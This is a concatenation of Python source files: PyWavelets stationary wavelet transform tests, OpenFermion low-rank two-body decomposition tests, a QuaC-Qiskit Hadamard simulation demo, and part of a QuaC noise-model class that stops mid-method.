assert_allclose(x, xr, rtol=1e-6, atol=1e-7)
def test_swt2_ndim_error():
x = np.ones(8)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
assert_raises(ValueError, pywt.swt2, x, 'haar', level=1)
@dec.slow
def test_swt2_iswt2_integration(wavelets=None):
# This function performs a round-trip swt2/iswt2 transform test on
# all available types of wavelets in PyWavelets - except the
# 'dmey' wavelet. The latter has been excluded because it does not
# produce very precise results. This is likely due to the fact
# that the 'dmey' wavelet is a discrete approximation of a
# continuous wavelet. All wavelets are tested up to 3 levels. The
# test validates neither swt2 or iswt2 as such, but it does ensure
# that they are each other's inverse.
max_level = 3
if wavelets is None:
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet is a special case - disregard it for now
wavelets.remove('dmey')
for current_wavelet_str in wavelets:
current_wavelet = pywt.Wavelet(current_wavelet_str)
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power + max_level - 1)
X = np.arange(input_length**2).reshape(input_length, input_length)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
coeffs = pywt.swt2(X, current_wavelet, max_level)
Y = pywt.iswt2(coeffs, current_wavelet)
assert_allclose(Y, X, rtol=1e-5, atol=1e-5)
def test_swt2_iswt2_quick():
test_swt2_iswt2_integration(wavelets=['db1', ])
def test_swt2_axes():
atol = 1e-14
current_wavelet = pywt.Wavelet('db2')
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power)
X = np.arange(input_length**2).reshape(input_length, input_length)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
(cA1, (cH1, cV1, cD1)) = pywt.swt2(X, current_wavelet, level=1)[0]
# opposite order
(cA2, (cH2, cV2, cD2)) = pywt.swt2(X, current_wavelet, level=1,
axes=(1, 0))[0]
assert_allclose(cA1, cA2, atol=atol)
assert_allclose(cH1, cV2, atol=atol)
assert_allclose(cV1, cH2, atol=atol)
assert_allclose(cD1, cD2, atol=atol)
# duplicate axes not allowed
assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1,
axes=(0, 0))
# too few axes
assert_raises(ValueError, pywt.swt2, X, current_wavelet, 1, axes=(0, ))
def test_iswt2_2d_only():
# iswt2 is not currently compatible with data that is not 2D
x_3d = np.ones((4, 4, 4))
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
c = pywt.swt2(x_3d, 'haar', level=1)
assert_raises(ValueError, pywt.iswt2, c, 'haar')
def test_swtn_axes():
atol = 1e-14
current_wavelet = pywt.Wavelet('db2')
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power)
X = np.arange(input_length**2).reshape(input_length, input_length)
coeffs = pywt.swtn(X, current_wavelet, level=1, axes=None)[0]
# opposite order
coeffs2 = pywt.swtn(X, current_wavelet, level=1, axes=(1, 0))[0]
assert_allclose(coeffs['aa'], coeffs2['aa'], atol=atol)
assert_allclose(coeffs['ad'], coeffs2['da'], atol=atol)
assert_allclose(coeffs['da'], coeffs2['ad'], atol=atol)
assert_allclose(coeffs['dd'], coeffs2['dd'], atol=atol)
# 0-level transform
empty = pywt.swtn(X, current_wavelet, level=0)
assert_equal(empty, [])
# duplicate axes not allowed
assert_raises(ValueError, pywt.swtn, X, current_wavelet, 1, axes=(0, 0))
# data.ndim = 0
assert_raises(ValueError, pywt.swtn, np.asarray([]), current_wavelet, 1)
# start_level too large
assert_raises(ValueError, pywt.swtn, X, current_wavelet,
level=1, start_level=2)
# level < 1 in swt_axis call
assert_raises(ValueError, swt_axis, X, current_wavelet, level=0,
start_level=0)
# odd-sized data not allowed
assert_raises(ValueError, swt_axis, X[:-1, :], current_wavelet, level=0,
start_level=0, axis=0)
@dec.slow
def test_swtn_iswtn_integration(wavelets=None):
# This function performs a round-trip swtn/iswtn transform for various
# possible combinations of:
# 1.) 1 out of 2 axes of a 2D array
# 2.) 2 out of 3 axes of a 3D array
#
# To keep test time down, only wavelets of length <= 8 are run.
#
# This test does not validate swtn or iswtn individually, but only
# confirms that iswtn yields an (almost) perfect reconstruction of swtn.
max_level = 3
if wavelets is None:
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet is a special case - disregard it for now
wavelets.remove('dmey')
for ndim_transform in range(1, 3):
ndim = ndim_transform + 1
for axes in combinations(range(ndim), ndim_transform):
for current_wavelet_str in wavelets:
wav = pywt.Wavelet(current_wavelet_str)
if wav.dec_len > 8:
continue # avoid excessive test duration
input_length_power = int(np.ceil(np.log2(max(
wav.dec_len,
wav.rec_len))))
N = 2**(input_length_power + max_level - 1)
X = np.arange(N**ndim).reshape((N, )*ndim)
coeffs = pywt.swtn(X, wav, max_level, axes=axes)
coeffs_copy = deepcopy(coeffs)
Y = pywt.iswtn(coeffs, wav, axes=axes)
assert_allclose(Y, X, rtol=1e-5, atol=1e-5)
# verify the inverse transform didn't modify any coeffs
for c, c2 in zip(coeffs, coeffs_copy):
for k, v in c.items():
assert_array_equal(c2[k], v)
def test_swtn_iswtn_quick():
test_swtn_iswtn_integration(wavelets=['db1', ])
def test_iswtn_errors():
x = np.arange(8**3).reshape(8, 8, 8)
max_level = 2
axes = (0, 1)
w = pywt.Wavelet('db1')
coeffs = pywt.swtn(x, w, max_level, axes=axes)
# more axes than dimensions transformed
assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 1, 2))
# duplicate axes not allowed
assert_raises(ValueError, pywt.iswtn, coeffs, w, axes=(0, 0))
# mismatched coefficient size
coeffs[0]['da'] = coeffs[0]['da'][:-1, :]
assert_raises(RuntimeError, pywt.iswtn, coeffs, w, axes=axes)
def test_per_axis_wavelets():
# tests a separate wavelet for each axis.
rstate = np.random.RandomState(1234)
data = rstate.randn(16, 16, 16)
level = 3
# wavelet can be a string or wavelet object
wavelets = (pywt.Wavelet('haar'), 'sym2', 'db4')
coefs = pywt.swtn(data, wavelets, level=level)
assert_allclose(pywt.iswtn(coefs, wavelets), data, atol=1e-14)
# 1-tuple also okay
coefs = pywt.swtn(data, wavelets[:1], level=level)
assert_allclose(pywt.iswtn(coefs, wavelets[:1]), data, atol=1e-14)
# length of wavelets doesn't match the length of axes
assert_raises(ValueError, pywt.swtn, data, wavelets[:2], level)
assert_raises(ValueError, pywt.iswtn, coefs, wavelets[:2])
# swt2/iswt2 also support per-axis wavelets/modes
data2 = data[..., 0]
coefs2 = pywt.swt2(data2, wavelets[:2], level)
assert_allclose(pywt.iswt2(coefs2, wavelets[:2]), data2, atol=1e-14)
def test_error_on_continuous_wavelet():
# A ValueError is raised if a Continuous wavelet is selected
data = np.ones((16, 16))
with warnings.catch_warnings(): # avoid FutureWarning in swt2
warnings.simplefilter('ignore', FutureWarning)
for dec_func, rec_func in zip([pywt.swt, pywt.swt2, pywt.swtn],
[pywt.iswt, pywt.iswt2, pywt.iswtn]):
for cwave in ['morl', pywt.DiscreteContinuousWavelet('morl')]:
assert_raises(ValueError, dec_func, data, wavelet=cwave,
level=3)
c = dec_func(data, 'db1', level=3)
assert_raises(ValueError, rec_func, c, wavelet=cwave)
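def _roundtrip_demo():
    # illustrative (an addition, not a test): the perfect-reconstruction
    # property that test_swt_roundtrip_dtypes verifies, in three lines
    x = np.arange(16, dtype=np.float64)
    coeffs = pywt.swt(x, 'db2', level=2)
    return np.allclose(pywt.iswt(coeffs, 'db2'), x)  # True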
if __name__ == '__main__':
run_module_suite()
``` |
{
"source": "0tt3r/OpenFermion",
"score": 2
} |
#### File: openfermion/utils/_low_rank_test.py
```python
import itertools
import numpy
import os
import unittest
from openfermion.config import THIS_DIRECTORY
from openfermion.hamiltonians import MolecularData
from openfermion.ops import FermionOperator
from openfermion.transforms import get_fermion_operator
from openfermion.utils import (chemist_ordered, eigenspectrum,
get_chemist_two_body_coefficients,
is_hermitian,
low_rank_two_body_decomposition,
low_rank_spatial_two_body_decomposition,
normal_ordered,
prepare_one_body_squared_evolution,
random_interaction_operator)
class ChemistTwoBodyTest(unittest.TestCase):
def test_operator_consistency(self):
# Initialize a random InteractionOperator and FermionOperator.
n_qubits = 4
random_interaction = random_interaction_operator(
n_qubits, real=False, seed=34281)
random_fermion = get_fermion_operator(random_interaction)
# Convert to chemist ordered tensor.
io_constant, io_one_body_coefficients, io_chemist_tensor = \
get_chemist_two_body_coefficients(random_interaction)
fo_constant, fo_one_body_coefficients, fo_chemist_tensor = \
get_chemist_two_body_coefficients(random_fermion)
# Ensure consistency between FermionOperator and InteractionOperator.
self.assertAlmostEqual(io_constant, fo_constant)
one_body_difference = numpy.sum(numpy.absolute(
io_one_body_coefficients - fo_one_body_coefficients))
self.assertAlmostEqual(0., one_body_difference)
two_body_difference = numpy.sum(numpy.absolute(
io_chemist_tensor - fo_chemist_tensor))
self.assertAlmostEqual(0., two_body_difference)
# Convert output to FermionOperator.
output_operator = FermionOperator()
output_operator += FermionOperator((), fo_constant)
# Convert one-body.
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = fo_one_body_coefficients[p, q]
output_operator += FermionOperator(term, coefficient)
# Convert two-body.
for p, q, r, s in itertools.product(range(n_qubits), repeat=4):
term = ((p, 1), (q, 0), (r, 1), (s, 0))
coefficient = fo_chemist_tensor[p, q, r, s]
output_operator += FermionOperator(term, coefficient)
# Check that difference is small.
difference = normal_ordered(random_fermion - output_operator)
self.assertAlmostEqual(0., difference.induced_norm())
def test_exception(self):
# Initialize a bad FermionOperator.
n_qubits = 4
random_interaction = random_interaction_operator(n_qubits, seed=36229)
random_fermion = get_fermion_operator(random_interaction)
bad_term = ((1, 1), (2, 1))
random_fermion += FermionOperator(bad_term)
# Check for exception.
with self.assertRaises(TypeError):
fo_constant, fo_one_body_coefficients, fo_chemist_tensor = (
get_chemist_two_body_coefficients(random_fermion))
class LowRankTest(unittest.TestCase):
def test_operator_consistency(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
random_operator = get_fermion_operator(
random_interaction_operator(n_qubits, seed=28644))
# Convert to chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(random_operator))
# Build back operator constant and one-body components.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor))
self.assertFalse(trunc_error)
# Check for exception.
with self.assertRaises(ValueError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor,
truncation_threshold=1.,
final_rank=1))
# Build back two-body component.
for l in range(n_qubits ** 2):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator ** 2)
# Test for consistency.
difference = normal_ordered(decomposed_operator - random_operator)
self.assertAlmostEqual(0., difference.induced_norm())
def test_spatial_operator_consistency(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
filename = os.path.join(THIS_DIRECTORY, 'data',
'H2_sto-3g_singlet_0.7414')
molecule = MolecularData(filename=filename)
molecule_interaction = molecule.get_molecular_hamiltonian()
molecule_operator = get_fermion_operator(molecule_interaction)
constant = molecule_interaction.constant
one_body_coefficients = molecule_interaction.one_body_tensor[:, :]
two_body_coefficients = (
molecule_interaction.two_body_tensor[:, :, :, :])
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error, one_body_corrections = (
low_rank_spatial_two_body_decomposition(two_body_coefficients))
self.assertFalse(trunc_error)
# Build back operator constant and one-body components.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = (one_body_coefficients[p, q] +
one_body_corrections[p, q])
decomposed_operator += FermionOperator(term, coefficient)
# Check for exception.
with self.assertRaises(ValueError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_spatial_two_body_decomposition(
two_body_coefficients,
truncation_threshold=1.,
final_rank=1))
# Build back two-body component.
for l in range(one_body_squares.shape[0]):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator ** 2)
# Test for consistency.
difference = normal_ordered(decomposed_operator - molecule_operator)
self.assertAlmostEqual(0., difference.induced_norm())
# Decompose with slightly negative operator that must use eigen
molecule = MolecularData(filename=filename)
molecule.two_body_integrals[0, 0, 0, 0] -= 1
eigenvalues, one_body_squares, trunc_error, one_body_corrections = (
low_rank_spatial_two_body_decomposition(two_body_coefficients))
self.assertFalse(trunc_error)
# Check for property errors
with self.assertRaises(TypeError):
eigenvalues, one_body_squares, trunc_error = (
low_rank_spatial_two_body_decomposition(
two_body_coefficients + 0.01j,
truncation_threshold=1.,
final_rank=1))
# Perform decomposition with threshold
test_eigenvalues, one_body_squares, trunc_error, _ = (
low_rank_spatial_two_body_decomposition(two_body_coefficients,
truncation_threshold=1.0))
self.assertTrue(len(test_eigenvalues) < len(eigenvalues))
self.assertTrue(len(one_body_squares) == len(test_eigenvalues))
self.assertTrue(trunc_error > 0.)
# Perform decomposition with threshold
test_eigenvalues, one_body_squares, trunc_error, _ = (
low_rank_spatial_two_body_decomposition(two_body_coefficients,
final_rank=1))
self.assertTrue(len(test_eigenvalues) == 1)
self.assertTrue(len(one_body_squares) == 1)
self.assertTrue(trunc_error > 0.)
def test_rank_reduction(self):
# Initialize H2.
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., 0.7414))]
basis = 'sto-3g'
multiplicity = 1
filename = os.path.join(THIS_DIRECTORY, 'data',
'H2_sto-3g_singlet_0.7414')
molecule = MolecularData(
geometry, basis, multiplicity, filename=filename)
molecule.load()
# Get molecular Hamiltonian.
molecular_hamiltonian = molecule.get_molecular_hamiltonian()
# Get fermion Hamiltonian.
fermion_hamiltonian = normal_ordered(get_fermion_operator(
molecular_hamiltonian))
# Get chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(fermion_hamiltonian))
n_qubits = one_body_coefficients.shape[0]
# Rank reduce with threshold.
errors = []
for truncation_threshold in [1., 0.1, 0.01, 0.001]:
# Add back one-body terms and constant.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Rank reduce.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(
chemist_tensor,
truncation_threshold=truncation_threshold))
# Make sure error is below truncation specification.
self.assertTrue(trunc_error < truncation_threshold)
# Reassemble FermionOperator.
l_max = eigenvalues.size
for l in range(l_max):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator**2)
# Test for consistency.
difference = normal_ordered(
decomposed_operator - fermion_hamiltonian)
errors += [difference.induced_norm()]
self.assertTrue(errors[-1] <= trunc_error or
abs(errors[-1] - trunc_error) < 1e-6)
self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0])
# Rank reduce by setting final rank.
errors = []
for final_rank in [4, 6, 8, 10, 12]:
# Add back one-body terms and constant.
decomposed_operator = FermionOperator((), constant)
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_coefficients[p, q]
decomposed_operator += FermionOperator(term, coefficient)
# Rank reduce.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(
chemist_tensor, final_rank=final_rank))
# Reassemble FermionOperator.
l_max = eigenvalues.size
for l in range(l_max):
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
decomposed_operator += eigenvalues[l] * (one_body_operator**2)
# Test for consistency.
difference = normal_ordered(
decomposed_operator - fermion_hamiltonian)
errors += [difference.induced_norm()]
self.assertTrue(errors[3] <= errors[2] <= errors[1] <= errors[0])
def test_one_body_square_decomposition(self):
# Initialize a random two-body FermionOperator.
n_qubits = 4
random_operator = get_fermion_operator(
random_interaction_operator(n_qubits, seed=17004))
# Convert to chemist tensor.
constant, one_body_coefficients, chemist_tensor = (
get_chemist_two_body_coefficients(random_operator))
# Perform decomposition.
eigenvalues, one_body_squares, trunc_error = (
low_rank_two_body_decomposition(chemist_tensor))
# Build back two-body component.
for l in range(n_qubits ** 2):
# Get the squared one-body operator.
one_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (q, 0))
coefficient = one_body_squares[l, p, q]
one_body_operator += FermionOperator(term, coefficient)
one_body_squared = one_body_operator ** 2
# Get the squared one-body operator via one-body decomposition.
density_density_matrix, basis_transformation_matrix = (
prepare_one_body_squared_evolution(one_body_squares[l]))
two_body_operator = FermionOperator()
for p, q in itertools.product(range(n_qubits), repeat=2):
term = ((p, 1), (p, 0), (q, 1), (q, 0))
coefficient = density_density_matrix[p, q]
two_body_operator += FermionOperator(term, coefficient)
# Confirm that the rotations diagonalize the one-body squares.
hopefully_diagonal = basis_transformation_matrix.dot(
numpy.dot(one_body_squares[l],
numpy.transpose(numpy.conjugate(
basis_transformation_matrix))))
diagonal = numpy.diag(hopefully_diagonal)
difference = hopefully_diagonal - numpy.diag(diagonal)
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
density_density_alternative = numpy.outer(diagonal, diagonal)
difference = density_density_alternative - density_density_matrix
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
# Test spectra.
one_body_squared_spectrum = eigenspectrum(one_body_squared)
two_body_spectrum = eigenspectrum(two_body_operator)
difference = two_body_spectrum - one_body_squared_spectrum
self.assertAlmostEqual(0., numpy.amax(numpy.absolute(difference)))
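def _low_rank_demo():
    # illustrative helper (an addition, not part of the test suite): the
    # decomposition workflow exercised above, end to end on a random operator
    op = get_fermion_operator(random_interaction_operator(4, seed=1))
    constant, one_body, chemist_tensor = get_chemist_two_body_coefficients(op)
    eigenvalues, one_body_squares, trunc_error = low_rank_two_body_decomposition(chemist_tensor)
    return eigenvalues.size, trunc_error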
``` |
{
"source": "0tt3r/QuaC-qiskit",
"score": 3
} |
#### File: examples/demos/hadamard_example.py
```python
import math
import matplotlib.pyplot as plt
from qiskit import QuantumCircuit, execute
from qiskit.tools.visualization import plot_histogram
from quac_qiskit import Quac
def main():
circuit1 = QuantumCircuit(5, 5)
circuit2 = QuantumCircuit(5, 5)
circuit3 = QuantumCircuit(1, 1)
circuit1.h(0)
circuit2.u2(0, math.pi, 0)
circuit3.u3(math.pi/2, math.pi, 0, 0)
circuit1.measure(0, 0)
circuit2.measure(0, 0)
circuit3.measure(0, 0)
print("Available QuaC backends:")
print(Quac.backends())
simulator = Quac.get_backend('fake_vigo_density_simulator', meas=True)
# Execute the circuit on the QuaC simulator
job1 = execute(circuit1, simulator)
job2 = execute(circuit2, simulator)
job3 = execute(circuit3, simulator)
print(f"Hadamard counts: {job1.result().get_counts()}")
print(f"U2 counts: {job2.result().get_counts()}")
print(f"U3 counts: {job3.result().get_counts()}")
plot_histogram(job1.result().get_counts())
plot_histogram((job2.result().get_counts()))
plot_histogram(job3.result().get_counts())
plt.show()
if __name__ == '__main__':
main()
```
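The three preparations above agree because H and U2(0, π) are the same unitary, while U3(π/2, π, 0) equals Z·H·Z and therefore yields the same measurement statistics from |0⟩. A quick check of the first equivalence (an illustrative sketch; `Operator.equiv` compares unitaries up to global phase):
```python
import math
from qiskit import QuantumCircuit
from qiskit.quantum_info import Operator

qc_h = QuantumCircuit(1)
qc_h.h(0)
qc_u2 = QuantumCircuit(1)
qc_u2.u2(0, math.pi, 0)
print(Operator(qc_h).equiv(Operator(qc_u2)))  # True (equal up to global phase)
```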
#### File: quac_qiskit/models/noise_model.py
```python
from typing import List, Dict, Tuple, Optional, Union
import warnings
import numpy as np
from scipy import sparse
from qiskit.ignis.characterization import T1Fitter, T2Fitter, ZZFitter
from qiskit.ignis.mitigation import TensoredMeasFitter
from qiskit.result import Result
from qiskit.providers import BaseBackend, BackendPropertyError
class QuacNoiseModel:
"""Defines noise to be applied to QuaC-based simulations
"""
def __init__(self, t1_times: List[float], t2_times: List[float], meas_matrices: Optional[List[np.array]] = None,
zz: Optional[Dict[Tuple[int, int], float]] = None):
"""Constructor for QuaC noise model
:param t1_times: a list of floats representing T1 relaxation times
:param t2_times: a list of floats representing T2 (note: not T2*) decoherence times
:param meas_matrices: a list of 2x2 numpy arrays representing measurement probabilities.
Given the matrix [[A, B], [C, D]] , A is the probability of measuring a qubit in state 0 given
it was prepped in state 0, and C is the probability of measuring the qubit in state 1 given it was
prepped in state 0. Similar logic can be applied to entries B and D
:param zz: a dictionary mapping ordered pairs of qubits to ZZ coupling frequency in GHz. Please note
this is in regular frequency, not angular frequency
"""
self._t1_times = t1_times
self._t2_times = t2_times
self._meas_matrices = meas_matrices
self._full_meas_matrices = []
self._zz = zz
def __str__(self):
string_representation = "Noise Model Description\n=============================="
if self.has_t1():
string_representation += "\nT1 times:"
for qubit, time in enumerate(self._t1_times):
string_representation += f"\n{qubit}: {time} ns"
if self.has_t2():
string_representation += "\nT2 times:"
for qubit, time in enumerate(self._t2_times):
string_representation += f"\n{qubit}: {time} ns"
if self.has_meas():
string_representation += "\nMeasurement error matrices:"
for qubit, mat in enumerate(self._meas_matrices):
string_representation += f"\n{qubit}: {mat}"
if self.has_zz():
string_representation += "\nZZ coupling terms:"
for pair, value in self._zz.items():
string_representation += f"\n{pair}: {value} GHz"
return string_representation
def has_t1(self) -> bool:
"""Check if T1 noise was defined
:return: a boolean
"""
return not (float('inf') in self._t1_times and len(set(self._t1_times)) == 1)
def has_t2(self) -> bool:
"""Check if T2 noise was defined
:return: a boolean
"""
return not (float('inf') in self._t2_times and len(set(self._t2_times)) == 1)
def has_meas(self) -> bool:
"""Check if measurement error was defined
:return: a boolean
"""
return self._meas_matrices is not None
def has_zz(self) -> bool:
"""Check if ZZ coupling noise was defined
:return: a boolean
"""
return self._zz is not None
def t1(self, qubit: int) -> float:
"""T1 getter method
:param qubit: an integer
:return: T1 time in nanoseconds
"""
return self._t1_times[qubit]
def t2(self, qubit: int) -> float:
"""T2 getter method
:param qubit: an integer
:return: T2 time in nanoseconds
"""
return self._t2_times[qubit]
def meas(self) -> List[sparse.csr_matrix]:
"""Measurement error matrix getter
:return: a list of sparse matrices ready for application
"""
if len(self._full_meas_matrices) == 0:
self.build_full_measurement_matrices()
return self._full_meas_matrices
def flip_prob(self, qubit: int, prep: int, meas: int):
"""The probability a qubit is in state meas after being prepared
in state prep
:param qubit: integer
:param prep: integer (0 or 1)
:param meas: integer (0 or 1)
:return: a float
"""
return self._meas_matrices[qubit][prep][meas]
def zz(self, qubit1: Optional[int] = None, qubit2: Optional[int] = None) -> Union[List[Tuple[int, int]], float]:
"""ZZ getter method
:param qubit1: an integer
:param qubit2: an integer
:return: ZZ frequency in GHz (or a list of defined qubit pairs if either argument is None)
"""
if qubit1 is None or qubit2 is None:
return list(self._zz.keys())
return self._zz[(qubit1, qubit2)]
@staticmethod
def get_noiseless_model(n_qubits: int):
"""Returns a QuacNoiseModel that is effectively noiseless
:param n_qubits: number of qubits, an integer
:return: a noiseless QuacNoiseModel
"""
return QuacNoiseModel([float('inf')] * n_qubits, [float('inf')] * n_qubits)
@classmethod
def from_backend(cls, backend: BaseBackend, **kwargs):
"""Automatically loads a QuaC noise model given a backend of type BaseBackend. Primarily
for speeding up definition of IBMQ hardware noise models in QuaC
:param backend: an object of type BaseBackend
:param kwargs: an optional dictionary mapping strings to booleans stating which types
of noise to include (keys are t1, t2, meas, and zz)
:return: a QuacNoiseModel object
"""
n_qubits = len(backend.properties().qubits)
qubits = list(range(n_qubits))
# Set up defaults
t1_times = [float('inf') for _ in range(n_qubits)]
t2_times = [float('inf') for _ in range(n_qubits)]
meas_matrices = None
zz = None
# Adjust defaults as appropriate
if kwargs.get("t1"):
t1_times = [backend.properties().t1(qubit) * 1e9 for qubit in qubits]
if kwargs.get("t2"):
t2_times = [backend.properties().t2(qubit) * 1e9 for qubit in qubits]
if kwargs.get("meas"):
meas_matrices = []
# Construct probability matrix for measurement error adjustments
for qubit in range(n_qubits):
# Not all backends have measurement errors added
try:
prob_meas0_prep1 = backend.properties().qubit_property(qubit, "prob_meas0_prep1")[0]
prob_meas1_prep0 = backend.properties().qubit_property(qubit, "prob_meas1_prep0")[0]
except BackendPropertyError:
warnings.warn("Measurement error simulation not supported on this backend")
break
qubit_measurement_error_matrix = np.array([
[1 - prob_meas1_prep0, prob_meas0_prep1],
[prob_meas1_prep0, 1 - prob_meas0_prep1]
])
meas_matrices.append(qubit_measurement_error_matrix)
if kwargs.get("zz"):
warnings.warn("ZZ coupling not supported in automatic loading")
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
@classmethod
def from_calibration_results(cls, backend: BaseBackend, t1_result: Tuple[np.array, Result],
t2_result: Tuple[np.array, Result], meas_result: Result,
zz_results: Dict[Tuple[int, int], Tuple[np.array, float, Result]]):
"""Takes results from running calibration circuits on hardware and constructs a
QuacNoiseModel object
:param backend: the backend on which the circuits were run (a BaseBackend object)
:param t1_result: a tuple with a list of delay times (in ns) as the 0th element and the T1
calibration Result object as the 1st element
:param t2_result: a tuple with a list of delay times (in ns) as the 0th element and the T2
calibration Result object as the 1st element
:param meas_result: a Result object from running measurement calibration circuits
:param zz_results: a dictionary mapping tuples of qubit indices to a ZZ coupling calibration circuit
Result object
:return: a QuacNoiseModel object
"""
n_qubits = len(backend.properties().qubits)
qubits = list(range(n_qubits))
# Set up defaults
t1_times = [float('inf') for _ in range(n_qubits)]
t2_times = [float('inf') for _ in range(n_qubits)]
meas_matrices = None
zz = None
# Adjust defaults as appropriate
if t1_result:
t1_fit = T1Fitter(t1_result[1], t1_result[0], qubits,
fit_p0=[1, 1e5, 0],
fit_bounds=([0, 0, -1], [2, 1e10, 1]),
time_unit="nano-seconds")
t1_times = t1_fit.time()
if t2_result:
t2_fit = T2Fitter(t2_result[1], t2_result[0], qubits,
fit_p0=[1, 1e4, 0],
fit_bounds=([0, 0, -1], [2, 1e10, 1]),
time_unit="nano-seconds")
t2_times = t2_fit.time()
if meas_result:
meas_fit = TensoredMeasFitter(meas_result, [[qubit] for qubit in qubits])
meas_matrices = meas_fit.cal_matrices
if zz_results:
zz = {}
for qubit1 in qubits:
for qubit2 in qubits:
if qubit1 < qubit2:
zz_information = zz_results[(qubit1, qubit2)]
xdata, osc_freq, zz_result = zz_information
zz_fit = ZZFitter(zz_result, xdata, [qubit1], [qubit2],
fit_p0=[1, osc_freq, -np.pi / 20, 0],
fit_bounds=([-0.5, 0, -np.pi, -0.5],
[1.5, 1e10, np.pi, 1.5]),
)
zz[(qubit1, qubit2)] = zz_fit.ZZ_rate()[0]
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
@classmethod
def from_array(cls, array: np.array, n_qubits: int):
"""Convert an array to a QuacNoiseModel. Array must contain T1 and T2 times at a
minimum
:param array: a Numpy array
:param n_qubits: the number of qubits simulated
:return: a QuacNoiseModel object
"""
list_array = list(100000 * array) # undo the 1e5 scaling applied in to_array()
# T1 and T2 times
t1_times = list_array[:n_qubits]
t2_times = list_array[n_qubits:2 * n_qubits]
if len(array) == 2 * n_qubits:
return QuacNoiseModel(t1_times, t2_times, None, None)
# Measurement error
meas_diagonals = list_array[2 * n_qubits:4 * n_qubits]
meas_matrices = []
for qubit in range(n_qubits):
diagonal = meas_diagonals[2 * qubit:2 * qubit + 2]
meas_matrices.append(np.array([
[diagonal[0], 1 - diagonal[1]],
[1 - diagonal[0], diagonal[1]]
]))
if len(array) == 4 * n_qubits:
return QuacNoiseModel(t1_times, t2_times, meas_matrices, None)
# ZZ coupling error
zz_compressed = list_array[4 * n_qubits:]
zz = {}
zz_ind = 0
for qubit1 in range(n_qubits):
for qubit2 in range(n_qubits):
if qubit1 < qubit2:
zz[(qubit1, qubit2)] = zz_compressed[zz_ind]
zz_ind += 1
return QuacNoiseModel(t1_times, t2_times, meas_matrices, zz)
def to_array(self) -> np.array:
"""Converts a QuacNoiseModel object to an array. Especially useful for optimization
:return: a Numpy array
"""
n_qubits = len(self._t1_times)
# Add T1 and T2 floats
list_form = self._t1_times + self._t2_times
# Add diagonal elements of 2x2 measurement matrices in qubit order
if self.has_meas():
for meas_matrix in self._meas_matrices:
list_form += list(meas_matrix.diagonal())
if self.has_zz():
# Add zz coupling in order (0, 1), (0, 2) ...
for qubit1 in range(n_qubits):
for qubit2 in range(n_qubits):
if qubit1 < qubit2:
list_form.append(self._zz[(qubit1, qubit2)])
return np.array(list_form) / 100000
def build_full_measurement_matrices(self):
"""Uses Kronecker product on 2x2 measurement matrices to compose a list of matrices that,
when all applied to a QuaC bitstring probability vector, result in a new bitstring
probability vector adjusted for measurement noise
"""
n_qubits = len(self._t1_times)
full_meas_matrices = []
if self._meas_matrices is None:
return [sparse.eye(2 ** n_qubits, format='csr') for _ in range(n_qubits)]  # identity over the full 2**n-dim probability vector
for qubit in range(n_qubits):
